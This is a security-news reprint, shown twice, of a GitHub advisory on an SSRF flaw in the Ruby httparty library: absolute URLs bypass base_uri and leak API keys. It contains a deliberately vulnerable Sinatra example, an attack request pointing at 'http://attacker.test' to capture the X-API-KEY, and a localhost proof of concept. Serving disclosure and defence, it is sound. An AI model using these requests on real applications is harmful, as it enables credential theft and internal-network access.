Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-hm5p-x4rq-38w4: httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra'
require 'httparty'

class RepositoryClient
  include HTTParty
  base_uri 'http://exmaple.test/api/v1/repositories/'
  headers 'X-API-KEY' => '1234567890'
end

post '/issue' do
  request_body = JSON.parse(request.body.read)
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
    "repository_id": "http://attacker.test",
    "title": "test"
}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

Is this behavior considered intentional in httparty?

A similar problem was reported and fixed in the HTTP client library axios in the past:
https://github.com/axios/axios/issues/6463

Also, Python’s urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

In my opinion, httparty should verify, right before sending the request, that either of the following conditions is met:

  1. The destination URL has a prefix matching base_uri.
  2. base_uri is not set.

PoC

Follow these steps to reproduce the issue:

  1. Set up two simple HTTP servers.

    mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

  2. Create a script (for example, main.rb):

    require 'httparty'

class Client
  include HTTParty
  base_uri 'http://localhost:10001'
end

data = Client.get('http://localhost:10002').body
puts data

  3. Run the script:

    $ ruby main.rb
this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

  • Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
  • SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
  • Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.
ghsa
Open in Source
#vulnerability#web#ios#js#git#perl#ssrf#ruby

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require ‘sinatra’ require ‘httparty’

class RepositoryClient include HTTParty base_uri ‘http://exmaple.test/api/v1/repositories/’ headers ‘X-API-KEY’ => ‘1234567890’ end

post ‘/issue’ do request_body = JSON.parse(request.body.read) RepositoryClient.get(request_body[‘repository_id’]).body # do something json message: ‘OK’ end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
    "repository_id": "http://attacker.test",
    "title": "test"
}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

Is this behavior considered intentional in httparty?

A similar problem was reported and fixed in the HTTP client library axios in the past:
axios/axios#6463

Also, Python’s urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

In my opinion, httparty should verify, right before sending the request, that either of the following conditions is met:

  1. The destination URL has a prefix matching base_uri.
  2. base_uri is not set.

PoC

Follow these steps to reproduce the issue:

  1. Set up two simple HTTP servers.

    mkdir /tmp/server1 /tmp/server2 echo “this is server1” > /tmp/server1/index.html echo “this is server2” > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 &

  2. Create a script (for example, main.rb):

    require ‘httparty’

    class Client include HTTParty base_uri ‘http://localhost:10001’ end

    data = Client.get(‘http://localhost:10002’).body puts data

  3. Run the script:

    $ ruby main.rb this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

  • Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
  • SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
  • Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.

References

  • GHSA-hm5p-x4rq-38w4
  • jnunemaker/httparty@0529bcd

ghsa: Latest News

GHSA-r399-636x-v7f6: LangChain serialization injection vulnerability enables secret extraction
ghsa